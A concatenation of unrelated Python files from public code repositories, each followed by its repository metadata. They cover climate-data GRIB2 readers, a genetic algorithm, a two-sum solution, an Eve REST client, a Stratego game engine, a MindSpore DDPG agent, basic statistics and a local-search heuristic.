## awk -F, '{print $3}' grid.txt | uniq | tr "\n" ", "
lat = np.flip(np.array([-89.277, -88.340, -87.397, -86.454, -85.509
, -84.565, -83.620, -82.676, -81.731, -80.786
, -79.841, -78.897, -77.952, -77.007, -76.062
, -75.117, -74.173, -73.228, -72.283, -71.338
, -70.393, -69.448, -68.503, -67.559, -66.614
, -65.669, -64.724, -63.779, -62.834, -61.889
, -60.945, -60.000, -59.055, -58.110, -57.165
, -56.220, -55.275, -54.330, -53.386, -52.441
, -51.496, -50.551, -49.606, -48.661, -47.716
, -46.771, -45.827, -44.882, -43.937, -42.992
, -42.047, -41.102, -40.157, -39.212, -38.268
, -37.323, -36.378, -35.433, -34.488, -33.543
, -32.598, -31.653, -30.709, -29.764, -28.819
, -27.874, -26.929, -25.984, -25.039, -24.094
, -23.150, -22.205, -21.260, -20.315, -19.370
, -18.425, -17.480, -16.535, -15.590, -14.646
, -13.701, -12.756, -11.811, -10.866, -9.921
, -8.976, -8.031, -7.087, -6.142, -5.197
, -4.252, -3.307, -2.362, -1.417, -0.472
, 0.472, 1.417, 2.362, 3.307, 4.252
, 5.197, 6.142, 7.087, 8.031, 8.976
, 9.921, 10.866, 11.811, 12.756, 13.701
, 14.646, 15.590, 16.535, 17.480, 18.425
, 19.370, 20.315, 21.260, 22.205, 23.150
, 24.094, 25.039, 25.984, 26.929, 27.874
, 28.819, 29.764, 30.709, 31.653, 32.598
, 33.543, 34.488, 35.433, 36.378, 37.323
, 38.268, 39.212, 40.157, 41.102, 42.047
, 42.992, 43.937, 44.882, 45.827, 46.771
, 47.716, 48.661, 49.606, 50.551, 51.496
, 52.441, 53.386, 54.330, 55.275, 56.220
, 57.165, 58.110, 59.055, 60.000, 60.945
, 61.889, 62.834, 63.779, 64.724, 65.669
, 66.614, 67.559, 68.503, 69.448, 70.393
, 71.338, 72.283, 73.228, 74.173, 75.117
, 76.062, 77.007, 77.952, 78.897, 79.841
, 80.786, 81.731, 82.676, 83.620, 84.565
, 85.509, 86.454, 87.397, 88.340, 89.277]), axis=0)
num_list = []
for band in records:
if verbose:
print('Record #' + str(band), flush=True)
data_array = DS.GetRasterBand(band).ReadAsArray()
for row in data_array:
for value in row:
num_list.append(value*3600.0) # kg/m2/sec --> mm/h
DS = None # Close the file.
precip = np.array(num_list).reshape([len(records), len(lat), len(lon)])
DATA={}
DATA['lon'] = lon
DATA['lat'] = lat
DATA['precip'] = precip
return DATA
def read_cfsr_grib2(fn, band_list=None, verbose=False):
"""
RT = read_cfsr_grib2(fn)
example output:
In [23]: RT['lon'].shape
Out[23]: (384,)
In [24]: RT['lat'].shape
Out[24]: (190,)
In [25]: RT['precip'].shape
Out[25]: (180, 190, 384)
"""
DS = gdal.Open(fn, gdal.GA_ReadOnly)
width = DS.RasterXSize
height = DS.RasterYSize
lon = np.arange(0.0,359.51,0.5)
lat = np.arange(90.0,-90.01,-0.5)
n_records = DS.RasterCount
num_list = []
if band_list is None:
band_list = range(1, n_records+1)
for band in band_list:
if verbose:
print((str(band) + ' of ' + str(n_records)))
data_array = DS.GetRasterBand(band).ReadAsArray()
for row in data_array:
for value in row:
num_list.append(value)
DS = None # Close the file.
precip = np.array(num_list).reshape([int(len(band_list)/6), 6, len(lat), len(lon)])
#precip /= 1e6 # Values in file are multiplied by 1e6.
# kg/m2 in 1h is equivalent to mm/h.
DATA={}
DATA['lon'] = lon
DATA['lat'] = lat
DATA['precip'] = precip
return DATA
def get_cfsr_6h_rain(dt_ending, verbose=False):
"""
Read in the rainfall using read_cfs_historical_grib2(fn)
Then calculate the 6 hourly rain rate (mm/h) and return it.
CFSR rain is stored in monthly files. It it initialized every 6 h,
and the data provide hourly accumulations (in kg/m^2, equivalent to mm) like this:
1:0:d=2011120100:APCP:surface:0-1 hour acc fcst:
2:94325:d=2011120100:APCP:surface:1-2 hour acc fcst:
3:193206:d=2011120100:APCP:surface:2-3 hour acc fcst:
4:309596:d=2011120100:APCP:surface:3-4 hour acc fcst:
5:421187:d=2011120100:APCP:surface:4-5 hour acc fcst:
6:537704:d=2011120100:APCP:surface:5-6 hour acc fcst:
To get the 6 hourly accumulation, all 6 of these need to be added.
Then take the mean (e.g., divide by 6h) to get mm/h.
"""
dt_beginning = dt_ending - dt.timedelta(hours=6)
if dt_beginning < dt.datetime(2011,3,31,23,59,0):
fn_beginning = ('/home/orca/data/model_anal/cfsr/rain_accum/' + dt_beginning.strftime('%Y')
+ '/apcp.gdas.' + dt_beginning.strftime('%Y%m') + '.grb2')
else:
fn_beginning = ('/home/orca/data/model_anal/cfsr/rain_accum/' + dt_beginning.strftime('%Y')
+ '/apcp.cdas1.' + dt_beginning.strftime('%Y%m') + '.grb2')
if verbose:
print(fn_beginning, flush=True)
rec_num = 1 + int((dt_beginning - dt.datetime(dt_beginning.year, dt_beginning.month,1,0,0,0)).total_seconds()/3600.0)
F = read_cfsr_grib2(fn_beginning, band_list=range(rec_num,rec_num+6,1), verbose=verbose)
precip6hr = np.nanmean(F['precip'], axis=1)[0]
DATA={}
DATA['lon'] = F['lon']
DATA['lat'] = F['lat']
DATA['precip'] = precip6hr
return DATA
|
brandonwkerns/lpt-python-public
|
lpt/readdata.py
|
readdata.py
|
py
| 19,320 |
python
|
en
|
code
| 3 |
github-code
|
6
|
37559032301
|
import numpy as np
def fitness(f, x):
"""
Supplied function f(x) returns a value for fitness so long as f(x) has a range >= 0
:param f:
:param x:
:return:
"""
# return np.exp(f(x))
# e^y made table unreadable from extremely small numbers
# return f(x) if (int(x,2) > 0 and int(x,2) < 15) else 1
return f(x) if f(x) > 0 else 1
def generate_population(size):
pop = ['{0:04b}'.format(i) for i in range(size)]
return pop
def choose(population, size, relative=None):
if relative is None:
return np.random.choice(population, size)
return np.random.choice(population, relative, size)
def choose_parents(group, relative):
x1, x2 = np.random.choice(a=group, p=relative, size=2)
return x1, x2
def crossover(a, b):
pivot = np.random.randint(0, max(len(a), len(b)), size=1)[0]
c1 = a[0:pivot] + b[pivot:len(b)]
c2 = b[0:pivot] + a[pivot:len(a)]
return c1, c2
def mutate(child):
pivot = np.random.randint(0, len(child))
if child[pivot] == '0':
r = '1'
else:
r = '0'
child = child[:pivot] + r + child[pivot+1:]
return child
def ga(func, pop_size=15, elite_size=6, generations=500, pc=0.7, pm=0.1):
mostfit = -1
fitnesses = None
relative = None
avgfits = []
population = generate_population (pop_size)
for epoch in range(1, generations):
print("===========================")
print("Generation", epoch)
print("---------------------------")
elites = choose(population, elite_size)
while elites.size < pop_size:
fitnesses = [fitness(func, elite) for elite in elites]
relative = [(x/sum(fitnesses)) for x in fitnesses]
x1, x2 = choose(elites, relative, 2)
if np.random.random() <= pc:
c1, c2 = crossover(x1, x2)
if np.random.random() <= pm:
c1 = mutate(c1)
fitnesses.append(fitness(func, c1))
elites = np.append(elites, c1)
if np.random.random() <= pm:
c2 = mutate(c2)
fitnesses.append(fitness(func, c1))
elites = np.append(elites, c2)
avgfits.append(np.mean(fitnesses))
population = elites
print("Average Fitness:", np.around(np.mean(fitnesses), decimals=3))
print("{:>2}{:>10}{:>10}{:>15}{:>15}".format("N", "bin", "int", "fitness", "relative"))
for i in range(len(elites)):
print("{:>2}{:>10}{:>10}{:>15.4g}{:>15.2g}".format(
i, elites[i], int(elites[i], 2), np.around(fitness(func, elites[i]), decimals=4),
fitnesses[i]/sum(fitnesses)))
print("===========================")
return population, avgfits
|
shottah/expert-systems
|
assignment-3/GA.py
|
GA.py
|
py
| 2,807 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5454371991
|
"""
Problem:
1. Two Sum
Difficulty:
Easy
URL:
https://leetcode.com/problems/two-sum
Tags:
Array, Hash Table
Date:
2022-05-10T14:00:29.877163+08:00
"""
from typing import List
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
for i, num in enumerate(nums):
if target - num in nums[i + 1:]:
return [i, nums.index(target - num, i + 1)]
tests = [
(
([2, 7, 11, 15], 9,
),
[0, 1],
),
(
([3, 2, 4], 6,
),
[1, 2],
),
(
([3, 3], 6,
),
[0, 1],
),
]
|
s0u0b/leetcode
|
solutions/a00001_two_sum.py
|
a00001_two_sum.py
|
py
| 630 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43954128076
|
import json
import requests # see http://python-requests.org
def url_for(endpoint):
return 'http://localhost:5000/{}/'.format(endpoint)
def delete_all_people():
r = requests.delete(url_for('people'))
print("'people' deleted, server response:", r.status_code)
def post_people():
data = [
{'firstname': 'John', 'lastname': 'Doe'},
{'firstname': 'Mike', 'lastname': 'Green'},
]
response = requests.post(
url_for('people'),
json.dumps(data),
headers={'Content-Type': 'application/json'}
)
print("'people' posted, server response:", response.status_code)
def get_people():
r = requests.get(url_for('people'))
print('people downloaded, server response:', r.status_code)
if r.status_code == 200:
people = r.json()['_items']
print('{} people:'.format(len(people)))
for person in people:
print('{}, {}'.format(person['firstname'], person['_id']))
def main():
delete_all_people()
post_people()
get_people()
if __name__ == '__main__':
main()
|
talkpython/eve-building-restful-mongodb-backed-apis-course
|
code/clients/client.py
|
client.py
|
py
| 1,081 |
python
|
en
|
code
| 62 |
github-code
|
6
|
11250773237
|
import connexion
from openapi_server import orm
from openapi_server.db import db
from openapi_server.models.error import Error # noqa: E501
from openapi_server.models.qc_result import QcResult # noqa: E501
def samples_id_qc_result_delete(id): # noqa: E501
"""samples_id_qc_result_delete
Delete the QC result associated with a sample with {id}. # noqa: E501
:param id:
:type id: str
:rtype: None
"""
sample = orm.Sample.query.get(id)
if not sample or not sample.qc_result:
return Error(404, 'Not found'), 404
db.session.delete(sample.qc_result)
db.session.commit()
return '', 204
def samples_id_qc_result_get(id): # noqa: E501
"""samples_id_qc_result_get
Return the QC result associated with a sample. # noqa: E501
:param id:
:type id: str
:rtype: QcResult
"""
sample = orm.Sample.query.get(id)
if not sample or not sample.qc_result:
return Error(404, 'Not found'), 404
return sample.qc_result.to_model(), 200
def samples_id_qc_result_put(id, qc_result=None): # noqa: E501
"""samples_id_qc_result_put
Add or replace new QC result associated with a sample. # noqa: E501
:param id:
:type id: str
:param qc_result: QC result to be added
:type qc_result: dict | bytes
:rtype: QcResult
"""
if connexion.request.is_json:
qc_result = QcResult.from_dict(connexion.request.get_json()) # noqa: E501
sample = orm.Sample.query.get(id)
if not sample:
return Error(404, 'Not found'), 404
inst = orm.QcResult.from_model(qc_result)
inst.sample_id = sample.id
if sample.qc_result:
sample.qc_result = inst
else:
db.session.add(inst)
db.session.commit()
return inst.to_model(), 200, {'location': ''}
|
Mykrobe-tools/mykrobe-atlas-tracking-api
|
openapi_server/controllers/qc_result_controller.py
|
qc_result_controller.py
|
py
| 1,810 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75051529788
|
import logging
import random
from typing import Set, Generator, Optional
from .location import Location
from .move import Move
from .piece import Color, Piece, Rank
from .board import Board
class MoveSet:
_brd = None # type: Board
@staticmethod
def set_board(brd: Board) -> None:
r""" Sets the board for the entire class """
MoveSet._brd = brd
r""" Moves available to a player """
def __init__(self, color: Color):
r"""
:param color: Color that is making the moves
"""
self._avail = dict() # Available moves
self._color = color
@property
def avail(self) -> dict:
r""" Accessor for the available moves """
return self._avail
@staticmethod
def build(pieces: Set[Piece], locs: dict, other_locs: dict) -> 'MoveSet':
r"""
Factory method used to construct an initial move set.
:param pieces: All of the players pieces
:param locs: Location of the player pieces
:param other_locs: Location of pieces of other player
:return: Constructed move set
"""
assert MoveSet._brd is not None, "Board information be present"
assert pieces, "Piece set can never be empty"
color = next(iter(pieces)).color
ms = MoveSet(color)
for p in pieces:
ms.add_piece(p, locs, other_locs)
return ms
def add_piece(self, piece: Piece, locs: dict, other_locs: dict):
r"""
Add a piece's moves to the MoveSet
:param piece: Piece whose moves (if any) will be added
:param locs: Location of the player pieces
:param other_locs: Location of pieces of other player
"""
self._process_piece(piece, locs, other_locs, add=True)
def del_piece(self, piece: Piece, locs: dict, other_locs: dict):
r"""
Add a piece's moves to the MoveSet
:param piece: Piece whose moves (if any) will be added
:param locs: Location of the player pieces
:param other_locs: Location of pieces of other player
"""
self._process_piece(piece, locs, other_locs, add=False)
def _process_piece(self, piece: Piece, locs: dict, other_locs: dict, add: bool):
r"""
Standardizes adding/removing a piece since same algorithm with minor change.
:param piece: Piece to process
:param locs: Location for pieces of same color as \p Piece
:param other_locs: Location for other player's pieces
:param add: If True, add the piece, otherwise remove the piece
"""
# Verify color is same for all pieces
assert piece.color == self._color, "Piece set has pieces of different colors"
# Standard function for either adding or deleting a move
def _process_func(_p: Piece, _loc: Location):
if add:
try: self._add_move(_p, _loc, other_locs[_loc])
except KeyError: self._add_move(_p, _loc)
else: self._del_move(_p, _loc)
# Bombs and flags can be ignored
if piece.is_immobile(): return
# Check ordinary pieces
if piece.rank != Rank.scout():
for loc in piece.loc.neighbors():
# Ignore pieces not allowed by board or where piece of same color
if not self._brd.is_inside(loc) or loc in locs: continue
_process_func(piece, loc)
# Check scout pieces specially
else:
for direction_list in self._brd.to_edge_lists(piece.loc):
for loc in direction_list:
# If scout blocked by board location or same color, immediately stop
if not self._brd.is_inside(loc) or loc in locs: break
_process_func(piece, loc)
if loc in other_locs: break
def _add_move(self, p: Piece, other: Location, attacked: Optional[Piece] = None) -> None:
r""" Add \p piece's move to \p other to the \p MoveSet """
assert p.is_scout() or p.loc.is_adjacent(other)
key = self._make_move_key(p.loc, other)
# assert key not in self._avail
self._avail[key] = Move(p, p.loc, other, attacked)
def _del_move(self, p: Piece, other: Location) -> None:
r"""
Delete the corresponding move from the \p MoveSet
:param p: Piece whose move will be deleted
:param other: Location where \p p will be moved
"""
assert p.is_scout() or p.loc.is_adjacent(other)
key = self._make_move_key(p.loc, other)
del self._avail[key]
def has_move(self, p: Piece, new_loc: Location) -> bool:
r""" Returns True if the \p Piece has an availble move to the specified \p Location """
key = self._make_move_key(p.loc, new_loc)
return key in self._avail
def get_move(self, p: Piece, new_loc: Location) -> Optional[Move]:
r"""
Gets the move corresponding to the \p Piece and \p Location. If the corresponding \p Move
is not found, \p None is returned.
"""
key = self._make_move_key(p.loc, new_loc)
try: return self._avail[key]
except KeyError: return None
def __len__(self) -> int:
r""" Return number of moves in the \p MoveSet """
return len(self._avail)
def __contains__(self, item: Move) -> bool:
r""" Adds support for the "in" operator """
if item.piece is None: return False
return self.has_move(item.piece, item.new)
def remove_moves_after_add(self, loc: Location, plyr_locs: dict, other_locs: dict) -> None:
r"""
Process the adding of a piece at Location \p loc
:param loc: Location of added piece
:param plyr_locs: Location of pieces for same color as \p MoveSet
:param other_locs: Location of pieces of other \p Player
"""
self._handle_loc_change(loc, plyr_locs, other_locs, False)
def add_moves_after_delete(self, loc: Location, plyr_locs: dict, other_locs: dict) -> None:
r"""
Process the deletion of a piece that was at Location \p loc
:param loc: Location of deleted piece
:param plyr_locs: Location of pieces for same color as \p MoveSet
:param other_locs: Location of pieces of other \p Player
"""
self._handle_loc_change(loc, plyr_locs, other_locs, True)
def _handle_loc_change(self, loc: Location, plyr_locs: dict, other_locs: dict, add: bool):
r"""
Process a \p Location's state change by either removing or add moves to the MoveSet.
:param loc: Location whose state is being changed
:param plyr_locs: Locations of the implicit player's pieces
:param other_locs: Location dictionary for the other player
:param add: If True, add moves to the MoveSet. Otherwise, remove those locations.
"""
el = self._brd.to_edge_lists(loc)
el_groups = [(el.right, el.left), (el.left, el.right), (el.up, el.down), (el.down, el.up)]
def _add_func(_p: Piece, _loc: Location):
try: self._add_move(_p, _loc, other_locs[_loc])
except KeyError: self._add_move(_p, _loc)
for search, opp in el_groups:
# Find first piece in search direction (if any)
p = None
for srch in search:
if srch in plyr_locs: p = plyr_locs[srch]
elif srch in other_locs: p = other_locs[srch]
if p is not None: break
# If no piece in search direction
if p is None or p.is_immobile(): continue
# Ignore pieces of other color since will be handled in separate function call
if p.color != self._color: continue
# If found p is not a scout and not adjacent, move on
if not p.is_scout() and not p.loc.is_adjacent(loc): continue
# Delete first since may need to add in next step
if not add: self._del_move(p, loc)
# In an add, always add the move. In a delete, may need to add back if the moved
# piece is of the other player's color
if add or loc in other_locs:
_add_func(p, loc)
if p.is_scout():
for srch in opp:
if srch in plyr_locs: break
if add: _add_func(p, srch)
else: self._del_move(p, srch)
# Perform second since could still attack
if srch in other_locs: break
@staticmethod
def _make_move_key(orig: Location, new: Location):
return orig, new
def is_empty(self, cyclic_moves: Set[Move] = None) -> bool:
r""" Returns \p True if the \p MoveSet is empty """
if cyclic_moves is not None and cyclic_moves:
avail = set(self.avail.values())
# If available larger than cyclic, definitely not empty move set
if len(avail) > len(cyclic_moves): return False
# Check if each available moves in cyclic. If any not in there, not empty move set
for a_m in avail:
for c_m in cyclic_moves:
if Move.is_identical(a_m, c_m):
break
else:
return False
return True
return not bool(self.avail)
def __iter__(self):
return iter(self.avail.values())
class Player:
r""" Represents one of the two players """
def __init__(self, color: Color):
r"""
:param color: Color of the player
"""
self._color = color
# noinspection PyTypeChecker
self._move_set = None # type: MoveSet
self._locs = dict()
self._pieces = set()
@property
def color(self) -> Color:
r""" Accessor for the \p Player's \p Color. """
return self._color
@property
def num_pieces(self) -> int:
r""" Accessor for number of pieces the player has """
return len(self._pieces)
@property
def move_set(self) -> MoveSet:
r""" Accessor for the \p Player's \p MoveSet"""
return self._move_set
def add_piece(self, piece: Piece, other: 'Player' = None) -> None:
r""" Add \p piece to \p Player's set of pieces """
assert piece not in self._pieces, "Duplicate piece"
assert piece.loc not in self._locs, "Two pieces in same location"
self._pieces.add(piece)
self._locs[piece.loc] = piece
if other is not None:
assert self._color != other.color
self.move_set.add_piece(piece, self._locs, other._locs)
def delete_piece_info(self, piece: Piece, other: 'Player') -> None:
r""" Remove \p piece from the \p Player's set of pieces """
self._pieces.remove(piece)
del self._locs[piece.loc]
self.move_set.del_piece(piece, self._locs, other._locs)
def delete_moveset_info(self, loc: Location, other: 'Player') -> None:
r""" Update the MoveSet information after deleting a piece at Location \p loc """
assert self._color != other.color
self.move_set.add_moves_after_delete(loc, self._locs, other._locs)
def update_moveset_after_add(self, loc: Location, other: 'Player') -> None:
r"""
When adding a piece (i.e., moving it and placing it back down), some previously valid moves
become blocked. This method updates \p MoveSet to accomodate that.
:param loc: \p Location where piece was placed
:param other: Other player
"""
assert self._color != other.color
# pylint: disable=protected-access
self.move_set.remove_moves_after_add(loc, self._locs, other._locs)
def has_flag(self) -> bool:
r""" Returns True if the player has a flag """
flag = Rank.flag()
return any(p.rank == flag for p in self._pieces)
def get_piece_at_loc(self, loc: Location) -> Optional[Piece]:
r""" Returns the piece at the specified location. If no piece is there, returns None """
try: return self._locs[loc]
except KeyError: return None
def has_move(self, piece: Piece, new_loc: Location) -> bool:
r""" Returns \p True if the player has a move for the piece ot the specified \p Location """
assert piece is not None
return self.move_set.has_move(piece, new_loc)
def is_valid_next(self, m: Move) -> bool:
r"""
Checks whether move \m is in the player's \p MoveSet
:param m: \p Move to check
:return: True if \p m is a valid next move.
"""
return m in self.move_set
def get_move(self, piece: Piece, new_loc: Location) -> Optional[Move]:
r""" Returns \p True if the player has a move for the piece ot the specified \p Location """
assert piece is not None
return self.move_set.get_move(piece, new_loc)
def piece_locations(self) -> Set[Location]:
r""" Location of all of the \p Player's pieces """
set_locs = set(self._locs.keys())
assert len(set_locs) == len(self._pieces)
return set_locs
def pieces(self) -> Generator[Piece, None, None]:
r""" Generator that yields the Player's pieces """
for p in self._pieces:
yield p
def build_move_set(self, other: 'Player'):
r""" Construct the move set of the """
assert self._color != other.color
self._move_set = MoveSet.build(self._pieces, self._locs, other._locs)
def verify_piece_set(self, piece_set: Board.PieceSet) -> bool:
r"""
Verify that the player piece information is compliance with the \p Board \p PieceSet
:param piece_set: Piece set maximum counts
:return: True if the player's piece set information is in compliance
"""
pieces_by_rank = dict()
# Count the number of pieces for each rank
for p in self._pieces:
try: pieces_by_rank[p.rank] += 1
except KeyError: pieces_by_rank[p.rank] = 1
res = True
for r in Rank.get_all():
if r in pieces_by_rank and pieces_by_rank[r] > piece_set.get_rank_count(r):
logging.warning("Color %s has too many pieces of rank: \"%s\"", self._color.name, r)
res = False
return res
def get_random_move(self) -> Move:
r"""
Selects a piece to move uniformly at random. Then select the move from that piece's
available moves uniformly at random.
:return: Randomly selected move
"""
move_dict = dict()
keys = []
for m in self.move_set.avail.values():
try:
move_dict[m.piece].append(m)
except KeyError:
keys.append(m.piece)
move_dict[m.piece] = [m]
key = random.choice(keys)
return random.choice(move_dict[key])
|
ZaydH/stratego
|
src/stratego/player.py
|
player.py
|
py
| 14,932 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21276696396
|
import mindspore
from mindspore import Tensor, nn
from mindspore.common.initializer import Uniform, VarianceScaling
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from mindspore_rl.agent.actor import Actor
from mindspore_rl.agent.learner import Learner
from mindspore_rl.utils import OUNoise, SoftUpdate
class HuberLoss(nn.Cell):
"""Huber Loss"""
def __init__(self, delta=1.0):
super().__init__()
self.delta = Tensor(delta, mindspore.float32)
self.abs = P.Abs()
self.square = P.Square()
self.select = P.Select()
self.reduce_sum = P.ReduceSum()
def construct(self, predict, label):
abs_error = self.abs(predict - label)
cond = abs_error <= self.delta
loss = self.select(
cond,
0.5 * self.square(abs_error),
self.delta * abs_error - 0.5 * self.square(self.delta),
)
return self.reduce_sum(loss)
class DDPGPolicy:
"""This is DDPGPolicy class. You should define your networks (DDPGActorNet and DDPGCriticNet here)
which you prepare to use in the algorithm. Moreover, you should also define you loss function
(DDPGLossCell here) which calculates the loss between policy and your ground truth value.
"""
class DDPGActorNet(nn.Cell):
"""DDPGActorNet is the actor network of DDPG algorithm. It takes a set of state as input
and outputs miu, sigma of a normal distribution"""
def __init__(
self,
input_size,
hidden_size1,
hidden_size2,
output_size,
compute_type=mindspore.float32,
):
super(DDPGPolicy.DDPGActorNet, self).__init__()
weight_init = VarianceScaling(
scale=1.0 / 3, mode="fan_in", distribution="uniform"
)
self.dense1 = nn.Dense(
input_size, hidden_size1, weight_init=weight_init
).to_float(compute_type)
self.dense2 = nn.Dense(
hidden_size1, hidden_size2, weight_init=weight_init
).to_float(compute_type)
last_weight_init = Uniform(scale=0.003)
self.dense3 = nn.Dense(
hidden_size2, output_size, weight_init=last_weight_init
).to_float(compute_type)
self.tanh = P.Tanh()
self.relu = P.ReLU()
def construct(self, x):
"""calculate"""
x = self.relu(self.dense1(x))
x = self.relu(self.dense2(x))
x = self.tanh(self.dense3(x))
return x
class DDPGCriticNet(nn.Cell):
"""DDPGCriticNet is the critic network of DDPG algorithm. It takes a set of states as input
and outputs the value of input state"""
def __init__(
self,
obs_size,
action_size,
hidden_size1,
hidden_size2,
output_size,
compute_type=mindspore.float32,
):
super(DDPGPolicy.DDPGCriticNet, self).__init__()
weight_init = VarianceScaling(
scale=1.0 / 3, mode="fan_in", distribution="uniform"
)
self.dense1 = nn.Dense(
obs_size, hidden_size1, weight_init=weight_init
).to_float(compute_type)
self.dense2 = nn.Dense(
hidden_size1 + action_size, hidden_size2, weight_init=weight_init
).to_float(compute_type)
last_weight_init = Uniform(scale=0.003)
self.dense3 = nn.Dense(
hidden_size2, output_size, weight_init=last_weight_init
).to_float(compute_type)
self.concat = P.Concat(axis=-1)
self.relu = P.ReLU()
self.cast = P.Cast()
def construct(self, observation, action):
"""predict value"""
x = self.relu(self.dense1(observation))
action = self.cast(action, x.dtype)
x = self.concat((x, action))
x = self.relu(self.dense2(x))
x = self.dense3(x)
return x
def __init__(self, params):
# nn.Cell do not support clone or deepcopy. Create target network manually.
self.actor_net = self.DDPGActorNet(
params["state_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
params["action_space_dim"],
params["compute_type"],
)
self.target_actor_net = self.DDPGActorNet(
params["state_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
params["action_space_dim"],
params["compute_type"],
)
self.critic_net = self.DDPGCriticNet(
params["state_space_dim"],
params["action_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
1,
params["compute_type"],
)
self.target_critic_net = self.DDPGCriticNet(
params["state_space_dim"],
params["action_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
1,
params["compute_type"],
)
class DDPGActor(Actor):
"""This is an actor class of DDPG algorithm, which is used to interact with environment, and
generate/insert experience (data)"""
def __init__(self, params=None):
super().__init__()
self.actor_net = params["actor_net"]
self.env = params["collect_environment"]
self.expand_dims = P.ExpandDims()
self.squeeze = P.Squeeze()
low, high = self.env.action_space.boundary
self.clip_value_min = Tensor(low)
self.clip_value_max = Tensor(high)
self.noise = OUNoise(
params["stddev"], params["damping"], self.env.action_space.shape
)
def act(self, phase, params):
"""collect experience and insert to replay buffer (used during training)"""
actions = self.get_action(phase, params)
next_obs, rewards, done = self.env.step(actions)
rewards = self.expand_dims(rewards, 0)
done = self.expand_dims(done, 0)
return next_obs, actions, rewards, done
def get_action(self, phase, params):
"""get action"""
obs = self.expand_dims(params, 0)
actions = self.actor_net(obs)
actions = self.squeeze(actions)
if phase != 3:
actions = self.noise(actions)
actions = C.clip_by_value(actions, self.clip_value_min, self.clip_value_max)
return actions
class DDPGLearner(Learner):
"""This is the learner class of DDPG algorithm, which is used to update the policy net"""
class CriticLossCell(nn.Cell):
"""DDPGLossCell calculates the loss of DDPG algorithm"""
def __init__(self, gamma, target_actor_net, target_critic_net, critic_net):
super(DDPGLearner.CriticLossCell, self).__init__(auto_prefix=True)
self.gamma = gamma
self.target_actor_net = target_actor_net
self.target_critic_net = target_critic_net
self.critic_net = critic_net
self.huber_loss = HuberLoss()
def construct(self, obs, actions, rewards, next_obs, done):
"""calculate the total loss"""
# critic Loss
target_actions = self.target_actor_net(next_obs)
target_q_values = self.target_critic_net(next_obs, target_actions)
# One step td error.
td_targets = rewards + self.gamma * (1.0 - done) * target_q_values
q_values = self.critic_net(obs, actions)
critic_loss = self.huber_loss(td_targets, q_values)
return critic_loss
class ActorLossCell(nn.Cell):
"""ActorLossCell calculates the loss of DDPG algorithm"""
def __init__(self, actor_net, critic_net):
super(DDPGLearner.ActorLossCell, self).__init__(auto_prefix=True)
self.actor_net = actor_net
self.critic_net = critic_net
self.reduce_mean = P.ReduceMean()
def construct(self, obs):
"""calculate the total loss"""
actions = self.actor_net(obs)
q_values = self.critic_net(obs, actions)
actor_loss = -self.reduce_mean(q_values)
return actor_loss
def __init__(self, params):
super().__init__()
gamma = params["gamma"]
self.critic_net = params["critic_net"]
self.actor_net = params["actor_net"]
# optimizer network
critic_optimizer = nn.Adam(
self.critic_net.trainable_params(), learning_rate=params["critic_lr"]
)
actor_optimizer = nn.Adam(
self.actor_net.trainable_params(), learning_rate=params["actor_lr"]
)
# loss network
self.target_actor_net = params["target_actor_net"]
self.target_critic_net = params["target_critic_net"]
critic_loss_cell = self.CriticLossCell(
gamma, self.target_actor_net, self.target_critic_net, self.critic_net
)
critic_loss_cell = self.CriticLossCell(
gamma, self.target_actor_net, self.target_critic_net, self.critic_net
)
actor_loss_cell = self.ActorLossCell(self.actor_net, self.critic_net)
self.critic_train = nn.TrainOneStepCell(critic_loss_cell, critic_optimizer)
self.actor_train = nn.TrainOneStepCell(actor_loss_cell, actor_optimizer)
self.critic_train.set_train(mode=True)
self.actor_train.set_train(mode=True)
# soft update network
factor, interval = params["update_factor"], params["update_interval"]
params = self.actor_net.trainable_params() + self.critic_net.trainable_params()
target_params = (
self.target_actor_net.trainable_params()
+ self.target_critic_net.trainable_params()
)
self.soft_updater = SoftUpdate(factor, interval, params, target_params)
def learn(self, experience):
"""DDPG learners"""
obs, actions, rewards, next_obs, done = experience
critic_loss = self.critic_train(obs, actions, rewards, next_obs, done)
actor_loss = self.actor_train(obs)
# update target network parameters.
self.soft_updater()
return critic_loss + actor_loss
|
mindspore-lab/mindrl
|
mindspore_rl/algorithm/ddpg/ddpg.py
|
ddpg.py
|
py
| 10,399 |
python
|
en
|
code
| 21 |
github-code
|
6
|
21394429670
|
import numpy as np
import statistics
from scipy import stats
dataset= [5,6,7,5,6,5,7,4,5,5,5,5,7,5,6,6,7,6,6,7,7,7,6,5,6]
#mean value
mean= np.mean(dataset)
#median value
median = np.median(dataset)
#mode value
mode= stats.mode(dataset)
#standard Deviation
Std = statistics.stdev(dataset)
#Variance
Var = statistics.variance(dataset)
print("Mean: ", mean)
print("Median: ", median)
print("Mode: ", mode)
print("Std", Std)
print("Var", Var)
|
lamyanlok/FTDS
|
test.py
|
test.py
|
py
| 447 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4552178157
|
# Busca Local Múltiplos Inicios
# Local Search Multiple Starts
import sys
import time
sys.path.insert(1, '../stage_01')
sys.path.insert(1, '../')
from utils import corrent_solution_size, objetive_function, read_instance, viable_solution
from local_search import local_search
from semi_greedy import semi_greedy
import config
# Busca local múltiplos inícios + semi-guloso alpha + busca local primeira melhora
def multiple_starts_local_search(alpha, timeout):
desks, tests, empty = config.desks, config.tests, config.empty
desk_count = len(desks)
test_count = len(tests)
s_ = viable_solution(desk_count, desk_count, test_count)
value_ = objetive_function(s_)
initial_time = time.time()
current_time = time.time()
execution_time = current_time - initial_time
while execution_time < timeout:
s, _ = semi_greedy(alpha, False)
s, value = local_search(s, 0, False) # 1 = Primeira melhora
if value < value_:
s_ = s
value_ = value
current_time = time.time()
execution_time = current_time - initial_time
s_, value_ = corrent_solution_size(s_, empty)
return s_, value_
if __name__ == '__main__':
file_name = sys.argv[1]
timeout = int(sys.argv[2])
alpha = float(sys.argv[3])
config.set_timeout(timeout)
read_instance(file_name)
s_, value_ = multiple_starts_local_search(alpha, timeout)
print(s_)
print(value_)
|
guilhermelange/Test-Assignment-Problem
|
stage_02/multiple_starts_local_search_02.py
|
multiple_starts_local_search_02.py
|
py
| 1,452 |
python
|
en
|
code
| 0 |
github-code
|
6
